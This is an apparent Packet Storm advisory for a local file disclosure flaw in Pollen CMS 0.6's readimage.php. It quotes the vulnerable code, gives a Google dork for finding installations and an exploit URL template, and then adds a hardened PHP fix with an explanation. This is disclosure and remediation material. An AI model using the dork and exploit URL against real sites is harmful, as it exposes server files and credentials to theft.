Pollen CMS 0.6 File Disclosure

2013-04-01T00:00:00
ID PACKETSTORM:121036
Type packetstorm
Reporter MizoZ
Modified 2013-04-01T00:00:00

Description

                                        
                                            `# Title: Pollen CMS <= 0.6 - Local File Disclosure  
# Google Dork: intext:"Powered by Pollen CMS"  
# Date: 25 March 2013
# Exploit Author: MizoZ  
# Vendor Homepage: pollencms.com (BROKEN)  
# Software Link: https://code.google.com/p/pollencms/  
# Version: 0.6  
# Tested on: Ubuntu Desktop 12.04  
  
-- File "[path]/core/lib/readimage.php"  
  
02 - $image=urldecode($_GET["image"]);  
03 - if(is_file($image)){  
04 - header("Pragma: no-cache");  
05 - header("Expires: 0");  
06 - header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");  
07 - header("Cache-Control: no-cache, must-revalidate");  
08 - header("Content-type: image/jpg");  
09 - readfile($image);  
10 - }else{  
11 - header("HTTP/1.0 404 Not Found");  
12 - }  
  
  
-- Problem  
  
The script only verifies that the supplied path names an existing file (is_file) before passing it to readfile(); it never restricts the path to an image directory, so any file the web server process can read is returned to the client.
  
  
-- Exploit  
  
http://[ws]/[path]/core/lib/readimage.php?image=[LFI]  
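A hardened replacement for the handler quoted above, added here as an example and not taken from Pollen CMS. It assumes the images are stored under a fixed directory (IMAGE_DIR, an assumed location) and that only the file name, never a path, is meaningful in the request. The second urldecode() from the original is dropped because PHP has already decoded $_GET.

```php
<?php
// Added example (not Pollen CMS code): hardened version of readimage.php.
// IMAGE_DIR is an assumed location for the image store.
declare(strict_types=1);

const IMAGE_DIR = __DIR__ . '/../../images';

// Permitted extensions and the Content-Type sent for each.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Resolve a user-supplied image name to an absolute path inside $baseDir.
 * Returns null when the name is empty, has no permitted extension, does not
 * name a regular file, or resolves outside the image directory.
 */
function resolveImagePath(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // image directory missing or unreadable
    }

    // Keep only the file name; directory components in the request are
    // discarded so the request cannot select a location elsewhere.
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }

    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }

    // realpath() collapses any remaining ".." and follows symlinks; the
    // result must still sit strictly below the image directory.
    $full = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($full === false || !is_file($full)) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Request handling: same cache headers as the original, but only for a
// vetted path, and with a correct Content-Type for the file served.
$requested = isset($_GET['image']) ? (string) $_GET['image'] : '';
$path = resolveImagePath($requested, IMAGE_DIR);

if ($path === null) {
    http_response_code(404);
    exit;
}

$ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
header('Pragma: no-cache');
header('Expires: 0');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s', (int) filemtime($path)) . ' GMT');
header('Cache-Control: no-cache, must-revalidate');
header('Content-Type: ' . ALLOWED_TYPES[$ext]);
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

Three checks replace the single is_file() call: basename() strips any directory part of the request, the extension allowlist rejects anything that is not an image, and the realpath() prefix comparison guarantees the final path lies under the image directory even if a symlink inside it points elsewhere. Serving image/jpeg instead of the original's image/jpg also gives browsers a registered media type.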